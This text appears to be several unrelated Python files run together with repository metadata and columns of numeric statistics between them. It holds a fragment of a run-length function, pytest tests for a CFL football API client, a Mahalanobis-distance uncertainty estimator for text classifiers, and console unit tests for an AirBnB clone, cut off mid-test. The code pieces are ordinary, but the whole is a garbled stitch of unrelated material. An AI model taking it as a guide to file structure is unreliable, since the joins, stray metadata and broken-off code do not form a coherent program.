    best = 0   # longest run seen so far
    run = 0    # length of the current run of 1s
    for n in nums:
        if n == 1:
            run += 1
            if run > best:
                best = run
        else:
            # Any non-1 value ends the current run. (The original only reset
            # on n == 0, silently ignoring other values.)
            run = 0
    return best
if __name__ == '__main__':
main()
| 817.44
| 20,013
| 0.500196
| 10,047
| 20,436
| 1.016622
| 0.001891
| 1.956334
| 2.933033
| 3.908753
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0.979048
| 0
| 0.493783
| 0.008319
| 20,436
| 24
| 20,014
| 851.5
| 0.010214
| 0
| 0
| 0.105263
| 0
| 0
| 0.000392
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0
| 0
| 0.210526
| 0.052632
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 14
|
5cff7413f5a21b7876c160ba6fc46a4379049e9b
| 3,052
|
py
|
Python
|
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | 4
|
2018-08-21T21:44:09.000Z
|
2020-02-18T13:09:17.000Z
|
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | null | null | null |
test/test_cflapi_players.py
|
streibeb/cflapi
|
4e0bf609bab94f0f8c7f623409de7fa16bad2f78
|
[
"MIT"
] | null | null | null |
from test import *
PLAYER_ID = 159141
def test_get_players(response_keys):
    """Bulk player listing returns a dict containing every expected key."""
    client = CFLApi(API_KEY)
    payload = client.getPlayers()
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
def test_get_player(response_keys):
    """Single-player lookup returns the record for the requested player."""
    client = CFLApi(API_KEY)
    payload = client.getPlayer(PLAYER_ID)
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    assert payload['data'][0]['cfl_central_id'] == PLAYER_ID
def test_get_player_include_seasons(response_keys):
    """include='seasons' attaches a seasons dict to the player record."""
    client = CFLApi(API_KEY)
    payload = client.getPlayer(PLAYER_ID, include='seasons')
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    assert payload['data'][0]['cfl_central_id'] == PLAYER_ID
    assert isinstance(payload['data'][0]['seasons'], dict)
def test_get_player_include_game_by_game(response_keys):
    """include='game_by_game' attaches game-by-game stats to the record."""
    client = CFLApi(API_KEY)
    payload = client.getPlayer(PLAYER_ID, include='game_by_game')
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    assert payload['data'][0]['cfl_central_id'] == PLAYER_ID
    assert isinstance(payload['data'][0]['game_by_game'], dict)
def test_get_player_include_seasons_and_game_by_game(response_keys):
    """Requesting both includes attaches both seasons and game-by-game data."""
    client = CFLApi(API_KEY)
    payload = client.getPlayer(PLAYER_ID, include=['seasons','game_by_game'])
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    assert payload['data'][0]['cfl_central_id'] == PLAYER_ID
    assert isinstance(payload['data'][0]['seasons'], dict)
    assert isinstance(payload['data'][0]['game_by_game'], dict)
def test_get_players_sort_by_birth_date_asc(response_keys):
    """Ascending birth_date sort: first row is not later than the last."""
    client = CFLApi(API_KEY)
    payload = client.getPlayers(sort='birth_date')
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    first_row, last_row = payload['data'][0], payload['data'][-1]
    assert first_row['birth_date'] <= last_row['birth_date']
def test_get_players_sort_by_height_desc(response_keys):
    """Descending height sort ('-height'): first row is at least as tall."""
    client = CFLApi(API_KEY)
    payload = client.getPlayers(sort='-height')
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    first_row, last_row = payload['data'][0], payload['data'][-1]
    assert first_row['height'] >= last_row['height']
def test_get_players_filter_by_position_abbreviation(response_keys):
    """Filtering on position abbreviation 'QB' returns only quarterbacks."""
    client = CFLApi(API_KEY)
    payload = client.getPlayers(filter={'position_abbreviation': {'eq': 'QB'}})
    assert isinstance(payload, dict)
    assert set(response_keys).issubset(payload.keys()), "All keys should be in the response"
    for player in payload['data']:
        assert player['position']['abbreviation'] == 'QB'
| 40.157895
| 93
| 0.724443
| 414
| 3,052
| 5.113527
| 0.120773
| 0.136042
| 0.136042
| 0.079358
| 0.86821
| 0.86821
| 0.816722
| 0.816722
| 0.816722
| 0.771375
| 0
| 0.006894
| 0.144495
| 3,052
| 75
| 94
| 40.693333
| 0.803907
| 0
| 0
| 0.607143
| 0
| 0
| 0.180865
| 0.006881
| 0
| 0
| 0
| 0
| 0.482143
| 1
| 0.142857
| false
| 0
| 0.017857
| 0
| 0.160714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cf5d225b4d6d2eac6aaf83a46b7bc5747f325cde
| 9,541
|
py
|
Python
|
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
src/ue4nlp/ue_estimator_mahalanobis.py
|
AIRI-Institute/uncertainty_transformers
|
982b5ae8b39cb484ce3559a72f95d18f30487e38
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from tqdm import tqdm
import time
from utils.utils_heads import (
ElectraClassificationHeadIdentityPooler,
BertClassificationHeadIdentityPooler,
ElectraNERHeadIdentityPooler,
)
from utils.utils_inference import (
is_custom_head,
unpad_features,
pad_scores
)
from ue4nlp.mahalanobis_distance import (
mahalanobis_distance,
mahalanobis_distance_relative,
mahalanobis_distance_marginal,
compute_centroids,
compute_covariance
)
import logging
log = logging.getLogger()
class UeEstimatorMahalanobis:
    """Mahalanobis-distance uncertainty estimator for sequence classification.

    Workflow: call ``fit_ue`` once on training data to fit class-conditional
    centroids and covariance from penultimate-layer features, then call the
    instance on new data to obtain Mahalanobis-distance uncertainty scores.
    """

    def __init__(self, cls, ue_args, config, train_dataset):
        # `cls` is the wrapping classifier object: it exposes `_auto_model`
        # (the underlying transformer) and `predict` — presumably a trainer
        # wrapper; confirm against callers.
        self.cls = cls
        self.ue_args = ue_args
        self.config = config
        # NOTE(review): train_dataset is stored but never read in this class.
        self.train_dataset = train_dataset

    def __call__(self, X, y):
        """Return a dict of uncertainty scores for dataset X (see
        ``_predict_with_fitted_cov``)."""
        return self._predict_with_fitted_cov(X, y)

    def fit_ue(self, X, y=None, X_test=None):
        """Fit centroids and covariance from dataset X.

        X_test is accepted for interface compatibility but unused here.
        Labels are extracted from X when y is None.
        """
        cls = self.cls  # NOTE(review): unused local
        model = self.cls._auto_model  # NOTE(review): unused local
        log.info("****************Start fitting covariance and centroids **************")
        if y is None:
            y = self._exctract_labels(X)
        # Swap the classification head so `predict` yields features, not logits.
        self._replace_model_head()
        X_features = self._exctract_features(X)
        self.class_cond_centroids = self._fit_centroids(X_features, y)
        self.class_cond_covariance = self._fit_covariance(X_features, y)
        # Optionally also fit class-agnostic ("train") statistics, needed by
        # the relative and marginal MD variants.
        self.fit_all_md_versions = "fit_all_md_versions" in self.ue_args.keys() and self.ue_args.fit_all_md_versions
        if self.fit_all_md_versions:
            self.train_centroid = self._fit_centroids(X_features, y, class_cond=False)
            self.train_covariance = self._fit_covariance(X_features, y, class_cond=False)
        log.info("**************Done.**********************")

    def _fit_covariance(self, X, y, class_cond=True):
        # Covariance is computed around the class centroids or, when
        # class_cond is False, around the single train centroid.
        if class_cond:
            return compute_covariance(self.class_cond_centroids, X, y, class_cond)
        return compute_covariance(self.train_centroid, X, y, class_cond)

    def _fit_centroids(self, X, y, class_cond=True):
        return compute_centroids(X, y, class_cond)

    def _replace_model_head(self):
        """Replace the model's classifier with an identity pooler so that
        ``predict`` returns features instead of class logits."""
        log.info("Change classifier to Identity Pooler")
        cls = self.cls  # NOTE(review): unused local
        model = self.cls._auto_model
        use_paper_version = self.ue_args.get("use_paper_version", False) and not(self.ue_args.use_spectralnorm)
        use_activation = not use_paper_version
        if is_custom_head(model):
            model.classifier = ElectraClassificationHeadIdentityPooler(model.classifier, use_activation)
        else:
            model.classifier = BertClassificationHeadIdentityPooler(model.classifier)

    def _exctract_labels(self, X):
        # Method name keeps the file-wide "exctract" spelling [sic].
        return np.asarray([example["label"] for example in X])

    def _exctract_features(self, X):
        """Run the feature-extracting forward pass over X (labels removed)."""
        cls = self.cls
        model = self.cls._auto_model  # NOTE(review): unused local
        try:
            X = X.remove_columns("label")
        except:
            # Fallback for wrapped datasets exposing `.dataset` — presumably a
            # subset/view wrapper; verify against caller.
            X.dataset = X.dataset.remove_columns("label")
        X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
        return X_features

    def _predict_with_fitted_cov(self, X, y):
        """Score X with the previously fitted centroids/covariance.

        Returns a dict with "mahalanobis_distance", "ue_time", and (when
        fit_all_md_versions was enabled at fit time) the relative and
        marginal MD variants. Requires ``fit_ue`` to have been called first.
        """
        cls = self.cls  # NOTE(review): unused local
        model = self.cls._auto_model  # NOTE(review): unused local
        log.info("****************Compute MD with fitted covariance and centroids **************")
        start = time.time()
        if y is None:
            y = self._exctract_labels(X)
        X_features = self._exctract_features(X)
        end = time.time()
        eval_results = {}
        md, inf_time = mahalanobis_distance(None, None, X_features,
                                            self.class_cond_centroids, self.class_cond_covariance)
        # Reported UE time = distance computation + feature extraction.
        sum_inf_time = inf_time + (end - start)
        eval_results["mahalanobis_distance"] = md.tolist()
        eval_results["ue_time"] = sum_inf_time
        log.info(f"UE time: {sum_inf_time}")
        if self.fit_all_md_versions:
            md_relative = mahalanobis_distance_relative(None, None, X_features,
                                                        self.train_centroid, self.train_covariance)
            md_marginal = mahalanobis_distance_marginal(None, None, X_features,
                                                        self.class_cond_centroids, self.class_cond_covariance,
                                                        self.train_centroid, self.train_covariance)
            eval_results["mahalanobis_distance_relative"] = md_relative.tolist()
            eval_results["mahalanobis_distance_marginal"] = md_marginal.tolist()
        log.info("**************Done.**********************")
        return eval_results
class UeEstimatorMahalanobisNer:
    """Mahalanobis-distance uncertainty estimator for token-level (NER) tasks.

    Same scheme as ``UeEstimatorMahalanobis``, but labels and features arrive
    padded per token: padding is stripped (``unpad_features``) before fitting
    the statistics, and the resulting scores are padded back to the original
    (batch, seq) grid (``pad_scores``) on output.
    """

    def __init__(self, cls, ue_args, config, train_dataset):
        # `cls` is the wrapping classifier object: it exposes `_auto_model`
        # (the underlying transformer) and `predict`.
        self.cls = cls
        self.ue_args = ue_args
        self.config = config
        # NOTE(review): train_dataset is stored but never read in this class.
        self.train_dataset = train_dataset

    def __call__(self, X, y):
        """Return a dict of uncertainty scores for dataset X.

        ``y`` is accepted for interface compatibility; labels are always
        re-extracted from X inside ``_predict_with_fitted_cov``.
        """
        return self._predict_with_fitted_cov(X, y)

    def fit_ue(self, X, y=None, X_test=None):
        """Fit class-conditional centroids/covariance on dataset X.

        X_test is accepted for interface compatibility but unused here.
        Labels are extracted from X when y is None.
        """
        log.info("****************Start fitting covariance and centroids **************")
        if y is None:
            y, y_shape = self._exctract_labels(X)
        # Swap the classification head so `predict` yields features, not logits.
        self._replace_model_head()
        X_features = self._exctract_features(X)
        # Drop padding tokens before fitting any statistics.
        X_features, y = unpad_features(X_features, y)
        self.class_cond_centroids = self._fit_centroids(X_features, y)
        self.class_cond_covariance = self._fit_covariance(X_features, y)
        # Optionally also fit class-agnostic ("train") statistics, needed by
        # the relative and marginal MD variants.
        self.fit_all_md_versions = "fit_all_md_versions" in self.ue_args.keys() and self.ue_args.fit_all_md_versions
        if self.fit_all_md_versions:
            self.train_centroid = self._fit_centroids(X_features, y, class_cond=False)
            self.train_covariance = self._fit_covariance(X_features, y, class_cond=False)
        log.info("**************Done.**********************")

    def _fit_covariance(self, X, y, class_cond=True):
        # Covariance is computed around the class centroids or, when
        # class_cond is False, around the single train centroid.
        if class_cond:
            return compute_covariance(self.class_cond_centroids, X, y, class_cond)
        return compute_covariance(self.train_centroid, X, y, class_cond)

    def _fit_centroids(self, X, y, class_cond=True):
        return compute_centroids(X, y, class_cond)

    def _replace_model_head(self):
        """Replace the model's classifier with an identity pooler so that
        ``predict`` returns per-token features instead of logits."""
        log.info("Change classifier to Identity Pooler")
        model = self.cls._auto_model
        use_paper_version = self.ue_args.get("use_paper_version", False) and not(self.ue_args.use_spectralnorm)
        use_activation = not use_paper_version
        if is_custom_head(model):
            model.classifier = ElectraNERHeadIdentityPooler(model.classifier, use_activation)
        else:
            model.classifier = BertClassificationHeadIdentityPooler(model.classifier)

    def _exctract_labels(self, X):
        """Return (flat_labels, original_shape) for the padded label grid.

        Method name keeps the file-wide "exctract" spelling [sic].
        """
        y = np.asarray([example["labels"] for example in X])
        y_shape = y.shape
        return y.reshape(-1), y_shape

    def _exctract_features(self, X):
        """Run the feature forward pass over X and flatten to (tokens, dim)."""
        cls = self.cls
        try:
            X = X.remove_columns("labels")
        except Exception:  # narrowed from bare `except:`
            # Fallback for wrapped datasets exposing `.dataset` — presumably a
            # subset/view wrapper; verify against caller.
            X.dataset = X.dataset.remove_columns("labels")
        X_features = cls.predict(X, apply_softmax=False, return_preds=False)[0]
        X_features = X_features.reshape(-1, X_features.shape[-1])
        return X_features

    def _predict_with_fitted_cov(self, X, y):
        """Score X with the fitted statistics; scores are re-padded to the
        original token grid.

        Returns a dict with "mahalanobis_distance", "ue_time", and (when
        fit_all_md_versions was enabled at fit time) the relative and
        marginal MD variants. Requires ``fit_ue`` to have been called first.
        """
        log.info("****************Compute MD with fitted covariance and centroids **************")
        start = time.time()
        y_pad, y_shape = self._exctract_labels(X)
        X_features = self._exctract_features(X)
        X_features, y = unpad_features(X_features, y_pad)
        end = time.time()
        eval_results = {}
        md, inf_time = mahalanobis_distance(None, None, X_features,
                                            self.class_cond_centroids, self.class_cond_covariance)
        md = pad_scores(md, np.asarray(y_pad).reshape(y_shape), y_pad)
        # Reported UE time = distance computation + feature extraction.
        sum_inf_time = inf_time + (end - start)
        eval_results["mahalanobis_distance"] = md.tolist()
        eval_results["ue_time"] = sum_inf_time
        log.info(f"UE time: {sum_inf_time}")
        if self.fit_all_md_versions:
            md_relative = mahalanobis_distance_relative(None, None, X_features,
                                                        self.train_centroid, self.train_covariance)
            md_relative = pad_scores(md_relative, np.asarray(y_pad).reshape(y_shape), y_pad)
            md_marginal = mahalanobis_distance_marginal(None, None, X_features,
                                                        self.class_cond_centroids, self.class_cond_covariance,
                                                        self.train_centroid, self.train_covariance)
            # BUG FIX: the original padded md_relative a second time here and
            # never padded md_marginal, so the marginal scores were emitted on
            # the unpadded token grid. Pad md_marginal instead.
            md_marginal = pad_scores(md_marginal, np.asarray(y_pad).reshape(y_shape), y_pad)
            eval_results["mahalanobis_distance_relative"] = md_relative.tolist()
            eval_results["mahalanobis_distance_marginal"] = md_marginal.tolist()
        log.info("**************Done.**********************")
        return eval_results
| 38.62753
| 116
| 0.6013
| 1,105
| 9,541
| 4.847059
| 0.099548
| 0.050411
| 0.033981
| 0.029873
| 0.862957
| 0.862957
| 0.860717
| 0.847648
| 0.847648
| 0.840179
| 0
| 0.000887
| 0.291374
| 9,541
| 247
| 117
| 38.62753
| 0.791303
| 0
| 0
| 0.774725
| 0
| 0
| 0.089185
| 0.038566
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098901
| false
| 0
| 0.043956
| 0.027473
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8774ec73da9b87613faccad02ae7a7d5544e1c1
| 32,676
|
py
|
Python
|
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | null | null | null |
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | 1
|
2021-07-01T11:29:07.000Z
|
2021-07-01T11:29:07.000Z
|
tests/test_console.py
|
adrienmillot/AirBnB_clone
|
757bdea6064f8c8a1d0fad3e8ad30d9b08b3f75a
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/python3
from os import system
from models.engine.file_storage import FileStorage
import unittest
from io import StringIO
from unittest.mock import patch
from console import HBNBCommand
from models import storage
import os
class ConsolePromptingTest(unittest.TestCase):
    """Checks for the interpreter prompt string and empty-line handling."""

    def testPrompt(self):
        """
        Prompt command
        """
        self.assertEqual("(hbnb) ", HBNBCommand().prompt)

    def testEmptyLine(self):
        """
        Empty line
        """
        with patch('sys.stdout', new=StringIO()) as captured:
            HBNBCommand().onecmd("")
        self.assertEqual("", captured.getvalue().strip())
class ConsoleHelpTest(unittest.TestCase):
    """Verify each console command documents itself via ``help <cmd>``.

    NOTE: the expected strings use backslash line continuations, and the
    continuation lines are intentionally left unindented so that no extra
    spaces leak into the expected help text.
    """

    def testHelpCreate(self):
        """
        create() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help create")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Creates a new instance of BaseModel, \
saves it (to the JSON file) and prints the id.\n\n")

    def testHelpAll(self):
        """
        all() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help all")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Prints all string representation of \
all instances based or not on the class name.\n\n")

    def testHelpDestroy(self):
        """
        destroy() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help destroy")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Deletes an instance based on the \
class name and id (save the change into the JSON file).\n\n")

    def testHelpUpdate(self):
        """
        update() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help update")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Updates an instance based on the \
class name and id by adding or updating attribute (save the \
change into the JSON file).\n\n")

    def testHelpShow(self):
        """
        show() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help show")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Prints the string representation of \
an instance based on the class name and id.\n\n")

    def testHelpQuit(self):
        """
        quit have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help quit")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(),
                             "Quit command to exit the program\n\n")

    def testHelpEOF(self):
        """
        EOF command have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help EOF")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(),
                             "EOF command to exit the program\n\n")

    def testHelpCount(self):
        """
        count() method have help documented
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("help count")
            self.assertGreater(len(output.getvalue()), 0)
            self.assertEqual(output.getvalue(), "Update your command interpreter \
(console.py) to retrieve the number of instances of a class.\
\n\n")
class ConsoleExitTest(unittest.TestCase):
    """Both ``quit`` and ``EOF`` must terminate the interpreter."""

    def testDoQuit(self):
        """
        Quit
        """
        with self.assertRaises(SystemExit):
            HBNBCommand().onecmd("quit")

    def testDoEOF(self):
        """
        EOF
        """
        with self.assertRaises(SystemExit):
            HBNBCommand().onecmd("EOF")
class ConsoleAllTest(unittest.TestCase):
    """Tests for the ``all`` command in both space and dot notation."""

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: the original wrote ``FileStorage.__objects`` from inside
        # this test class, which name-mangles to
        # ``FileStorage._ConsoleAllTest__objects`` and never reset the real
        # private store.  Also dropped the spurious @classmethod decorator:
        # setUp/tearDown are instance-level unittest hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testAllInvalidClass(self):
        """
        all invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("all toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("toto.all()")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testAllMissingClass(self):
        """
        all() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd(".all()")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testAllInstanceSpaceNotation(self):
        """
        all instance command
        """
        self.__allInstanceSpaceNotation("Amenity", "User")
        self.__allInstanceSpaceNotation("BaseModel", "User")
        self.__allInstanceSpaceNotation("City", "User")
        self.__allInstanceSpaceNotation("Place", "User")
        self.__allInstanceSpaceNotation("Review", "User")
        self.__allInstanceSpaceNotation("State", "User")
        self.__allInstanceSpaceNotation("User", "BaseModel")

    def testAllInstanceDotNotation(self):
        """
        all() instance command
        """
        self.__allInstanceDotNotation("Amenity", "User")
        self.__allInstanceDotNotation("BaseModel", "User")
        self.__allInstanceDotNotation("City", "User")
        self.__allInstanceDotNotation("Place", "User")
        self.__allInstanceDotNotation("Review", "User")
        self.__allInstanceDotNotation("State", "User")
        self.__allInstanceDotNotation("User", "BaseModel")

    def __allInstanceSpaceNotation(self, prmClassName, prmOtherClassName):
        """Create, list via ``all <Class>``, check output, then destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue()  # renamed: ``id`` shadowed the builtin
        with patch("sys.stdout", new=StringIO()) as output:
            command = "all {}".format(prmClassName)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertIn(prmClassName, output.getvalue().strip())
            self.assertNotIn(prmOtherClassName, output.getvalue().strip())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __allInstanceDotNotation(self, prmClassName, prmOtherClassName):
        """Create, list via ``<Class>.all()``, check output, then destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue()
        with patch("sys.stdout", new=StringIO()) as output:
            command = "{}.all()".format(prmClassName)
            self.assertFalse(HBNBCommand().onecmd(command))
            self.assertIn(prmClassName, output.getvalue().strip())
            self.assertNotIn(prmOtherClassName, output.getvalue().strip())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))
class ConsoleCountTest(unittest.TestCase):
    """Tests for the ``count`` command in both space and dot notation."""

    __classes = [
        'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
    ]

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: ``FileStorage.__objects`` written inside this class
        # mangles to ``_ConsoleCountTest__objects``; reset the real store.
        # @classmethod was also dropped — setUp/tearDown are instance hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testCountMissingClass(self):
        """
        count() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("count")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testCountInvalidClass(self):
        """
        count() invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("count toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testCountInstanceSpaceNotation(self):
        """
        count instance command.
        """
        for className in self.__classes:
            self.__testCountSpaceNotation(className)

    def testCountInstanceDotNotation(self):
        """
        count() instance command.
        """
        for className in self.__classes:
            self.__testCountDotNotation(className)

    def __testCountSpaceNotation(self, prmClassName):
        """Count, create one, verify count incremented, then destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "count {}".format(prmClassName)))
            count = int(output.getvalue())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue()  # renamed from ``id`` (builtin shadow)
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "count {}".format(prmClassName)))
            self.assertEqual(output.getvalue().strip(), str(count + 1))
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))

    def __testCountDotNotation(self, prmClassName):
        """Same as space notation but via ``<Class>.count()``."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.count()".format(prmClassName)))
            count = int(output.getvalue())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue()
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.count()".format(prmClassName)))
            self.assertEqual(output.getvalue().strip(), str(count + 1))
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))
class ConsoleCreateTest(unittest.TestCase):
    """Tests for the ``create`` command across every model class."""

    __classes = [
        'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
    ]

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: ``FileStorage.__objects`` written inside this class
        # mangles to ``_ConsoleCreateTest__objects``; reset the real store.
        # @classmethod was also dropped — setUp/tearDown are instance hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testCreateMissingClass(self):
        """
        create() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("create")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testInvalidClass(self):
        """
        create() invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("create toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")

    def testCreateInstance(self):
        """
        create() every known class
        """
        for prmClassName in self.__classes:
            self.__testCreateObject(prmClassName)

    def __testCreateObject(self, prmClassName):
        """Create an instance, check it landed in storage, then destroy."""
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "create {}".format(prmClassName)))
            obj_id = output.getvalue().strip()  # renamed (builtin shadow)
            key = "{}.{}".format(prmClassName, obj_id)
            self.assertIn(key, storage.all().keys())
        with patch("sys.stdout", new=StringIO()) as output:
            self.assertFalse(HBNBCommand().onecmd(
                "{}.destroy({})".format(prmClassName, obj_id)))
class ConsoleDestroyTest(unittest.TestCase):
    """Tests for the ``destroy`` command in both space and dot notation."""

    __classes = [
        'BaseModel', 'User', 'State', 'City', 'Amenity', 'Place', 'Review'
    ]

    def setUp(self):
        """Stash any pre-existing file.json and reset the object store."""
        try:
            os.rename("file.json", "tmp")
        except IOError:
            pass
        # Bug fix: ``FileStorage.__objects`` written inside this class
        # mangles to ``_ConsoleDestroyTest__objects``; reset the real store.
        # @classmethod was also dropped — setUp/tearDown are instance hooks.
        FileStorage._FileStorage__objects = {}

    def tearDown(self):
        """Remove the test file.json and restore the stashed original."""
        try:
            os.remove("file.json")
        except IOError:
            pass
        try:
            os.rename("tmp", "file.json")
        except IOError:
            pass

    def testDestroyMissingClass(self):
        """
        destroy() missing class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("destroy")
            self.assertEqual(output.getvalue(), "** class name missing **\n")
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd(".destroy()")
            self.assertEqual(output.getvalue(), "** class name missing **\n")

    def testDestroyInvalidClass(self):
        """
        destroy() invalid class
        """
        with patch('sys.stdout', new=StringIO()) as output:
            HBNBCommand().onecmd("destroy toto")
            self.assertEqual(output.getvalue(), "** class doesn't exist **\n")
        with patch('sys.stdout', new=StringIO()) as output:
